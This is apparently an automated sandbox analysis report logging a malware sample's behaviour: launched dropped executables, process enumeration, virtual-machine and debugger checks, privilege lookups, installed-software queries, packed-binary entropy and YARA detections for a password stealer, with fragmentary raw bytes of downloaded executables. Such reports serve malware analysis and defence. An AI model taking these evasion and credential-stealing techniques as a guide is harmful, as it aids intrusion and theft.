ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe	1	1
ShellExecuteExW Sept. 6, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (45 events)

Time & API	Arguments	Status	Return
Process32FirstW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: [System Process] process_identifier: 0	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: System process_identifier: 4	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: smss.exe process_identifier: 224	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: csrss.exe process_identifier: 304	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: wininit.exe process_identifier: 352	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: csrss.exe process_identifier: 360	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: winlogon.exe process_identifier: 400	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: services.exe process_identifier: 444	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: lsass.exe process_identifier: 460	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: lsm.exe process_identifier: 468	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 572	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 652	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 724	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 784	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 832	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: audiodg.exe process_identifier: 900	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 992	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 292	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: spoolsv.exe process_identifier: 324	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 1048	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: srvany.exe process_identifier: 1284	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: KMService.exe process_identifier: 1436	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: conhost.exe process_identifier: 1448	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: taskhost.exe process_identifier: 1600	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: sppsvc.exe process_identifier: 1820	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: svchost.exe process_identifier: 1896	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: dwm.exe process_identifier: 1260	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: explorer.exe process_identifier: 1452	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: pw.exe process_identifier: 988	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: SearchIndexer.exe process_identifier: 1160	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: pw.exe process_identifier: 2320	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: taskhost.exe process_identifier: 2356	1	1
Process32NextW Sept. 6, 2023, 7:32 a.m.	snapshot_handle: 0x000000000000039c process_name: qZa2Z7Puv7E4iAuW3ONvhvPf.exe process_identifier: 2780	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: taskhost.exe process_identifier: 2216	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 2524	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: EPOgquOT1MnP1nqso8haYw46.exe process_identifier: 1536	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: U_WUTTisAZX3VLe2b40_scVK.exe process_identifier: 2760	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: nPtRtTHIn9wndsrAGmvS3n2G.exe process_identifier: 2752	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: Ms6gVLaCMj3QjsT0nxwUAzQV.exe process_identifier: 2756	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: x7v28_ox_gsKhD1Q9EW3AnPz.exe process_identifier: 1332	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: kSIDO1g7b2Ov3jXySZx1v2JG.exe process_identifier: 1308	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: WmiPrvSE.exe process_identifier: 1316	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: regsvr32.exe process_identifier: 3040	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: vbc.exe process_identifier: 2608	1	1
Process32NextW Sept. 6, 2023, 7:41 a.m.	snapshot_handle: 0x00000000000003b0 process_name: taskhost.exe process_identifier: 2368	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 6, 2023, 7:39 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00b00000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 6, 2023, 7:39 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes services.exe, qza2z7puv7e4iauw3onvhvpf.exe, u_wuttisazx3vle2b40_scvk.exe (3 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 6, 2023, 7:39 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd lïdð"ø0Pª®s@Àäôòv`°´ÐØäÐ8×ôÀØôPx(7×8m°.text÷0 `.rdatavÁ1@@.data$à4@À.pdataÈW6@@_RDATAüp7@@.vmp0ù57 `.vmp1m@À.vmp2Ä(km*k`h.relocôÀØ<k@@.rsrcäÐØD>k@@fixÎëvøVz~q.k}¤Ïx$Vø{_q.}ìG[w request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2023, 7:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù=LF¸SF¸SF¸Sò$¢K¸Sò$ Ë¸Sò$¡^¸SÆÃ®D¸SÆÃWU¸SÆÃPQ¸SÆÃVt¸SOÀÐM¸SOÀÀA¸SF¸RN¹SÈÃV`¸SÈÃSG¸SÈÃ¬G¸SÈÃQG¸SRichF¸SPELf¡¹dà!~à]@À@Á04dP°øßT)@T8³@,\ .text}~ `.rdataæ¦¨@@.data \@@À.didatx :@À.rsrcøß°à<@@.relocT)@BhOCè%ÃÌÌÌÌÌh Bè¯IYÃÌÌÌÌèèZ£8àCÃÌÌÌÌÌ¹HàCéUiÌÌÌÌÌÌ¹PåCèbßh°BèuIYÃÌÌÌÌÌÌÌÌÌÌ¹øaFèéFhÀBèUIYÃÌÌÌÌÌÌÌÌÌÌ¹EéÑÌÌÌÌÌÌ¹°Eè¡)hÐBè%IYÃÌÌÌÌÌÌÌÌÌÌ¹EèFhàBèIYÃÌÌÌÌÌÌÌÌÌÌ¹®EèhðBèåHYÃÌÌÌÌÌÌÌÌÌÌhBèÏHYÃÌÌÌÌUìì,EüVPÿ\| FÀu`E3ÉEÜÔýÿÿEäEEèEÜPMàÇEìAMðMôÿl Fðöt)SÿuVÿp FMüÀVQÃrÎÿ,BÿÖÃ[ë2À^ÉÂÌÂ¶D$Pÿt$ÿt$ÿL¡FPÿH¡FÂ¶D$÷ØÀà Pÿt$ÿt$ÿL¡FPÿX¡FÂUì}0tY}u]E ¹°E$¶ÀPÿuÿuè6öE t>ÿuÿ@¡FÀt1h!0PÿL¡FÀt!öE thBPÿD¡Fë ÿu¹°Eè62À]ÂUìE=rEPEPè`EPÿuèøCYY]Â¸Bè÷CQVñWuðè§²èW3ÿ`²}üèøV¼²ÆEüèéV³ÆEüèÚVt³ÆEüèËVÐ³ÆEüè~D¾à³¾ä³¾è³ÎÆEüèMôÆ_^d ÉÃ9tÿ1èkYÃéÅéèÿÿÿÁ³éW¸ èaCSUVWjjÿ´$( è{$ Øè·W½é¢D$Pè%ð·Qè_$¼$ tÀt3ÀfëÀtUhBD$PèUjjD$ûPèðf>*u:·NQè$Àt,j.Xj\f$XUf$$SPèxU¼$ÿ´$( WVèÀu'$ request_handle: 0x0000000000cc006c	1	1
InternetReadFile Sept. 6, 2023, 7:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELÚXdàZÈo;p@`@Èàd à0p PÓpdÔÀÓ@p.textYZ `.rdatad\|p~^@@.datah$ðÜ@À.rsrcà ô@@.relocp 0"ö@BhP6BèÏ(YÃÌÌÌÌhð5Bè¿(YÃÌÌÌÌj h\ÃB¹ûBèÿh°6Bè(YÃÌÌÌj hÃB¹Cèßh7Bè~(YÃÌÌÌjh¤ÃB¹Cè¿hp7Bè^(YÃÌÌÌj h¬ÃB¹üBèhÐ7Bè>(YÃÌÌÌjhÐÃB¹DCèh08Bè(YÃÌÌÌjhäÃB¹´úBè_h8Bèþ'YÃÌÌÌjh[ÃB¹ÔCè?hð8BèÞ'YÃÌÌÌjh[ÃB¹LCèhP9Bè¾'YÃÌÌÌjh[ÃB¹¬üBèÿh°9Bè'YÃÌÌÌjh[ÃB¹TúBèßh:Bè~'YÃÌÌÌjhÄB¹DûBè¿hp:Bè^'YÃÌÌÌjhÄB¹tCèhÐ:Bè>'YÃÌÌÌjh ÄB¹<ýBèh0;Bè'YÃÌÌÌjh4ÄB¹\Cè_h;Bèþ&YÃÌÌÌj(hDÄB¹LCè?hð;BèÞ&YÃÌÌÌjhpÄB¹ÿBèhP<Bè¾&YÃÌÌÌjh\|ÄB¹ìCèÿh°<Bè&YÃÌÌÌjDhÄB¹tCèßh=Bè~&YÃÌÌÌj\hÐÄB¹düBè¿hp=Bè^&YÃÌÌÌjh0ÅB¹TýBèhÐ=Bè>&YÃÌÌÌjh@ÅB¹\|ùBèh0>Bè&YÃÌÌÌjhHÅB¹\|ÿBè_h>Bèþ%YÃÌÌÌj<hdÅB¹LùBè?hð>BèÞ%YÃÌÌÌjh¤ÅB¹4ùBèhP?Bè¾%YÃÌÌÌjh´ÅB¹ôCèÿh°?Bè%YÃÌÌÌjhÌÅB¹Cèßh@Bè~%YÃÌÌÌjXhàÅB¹,þBè¿hp@Bè^%YÃÌÌÌjh<ÆB¹CèhÐ@Bè>%YÃÌÌÌjhTÆB¹ÜCèh0ABè%YÃÌÌÌjh`ÆB¹DCè_hABèþ$YÃÌÌÌjhlÆB¹$úBè?hðABèÞ$YÃÌÌÌ request_handle: 0x0000000000cc0020	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00667000', u'virtual_address': u'0x003cf000', u'entropy': 7.971862198833396, u'name': u'.vmp2', u'virtual_size': u'0x00666e90'}

entropy

7.97186219883

description

A section with a high entropy has been found

entropy

0.902533039648

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 6, 2023, 7:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2023, 7:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2023, 7:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (2 events)

process	qza2z7puv7e4iauw3onvhvpf.exe
process	u_wuttisazx3vle2b40_scvk.exe

Yara rule detected in process memory (18 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 78 events)

Time & API	Arguments	Status
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000051c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: AddressBook base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Connection Manager base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: DirectDrawEx base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: EditPlus base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: ENTERPRISE base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Fontcore base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Google Chrome base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IE40 base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IE4Data base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IE5BAKEX base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IEData base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: MobileOptionPack base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: SchedulingAgent base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: WIC base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
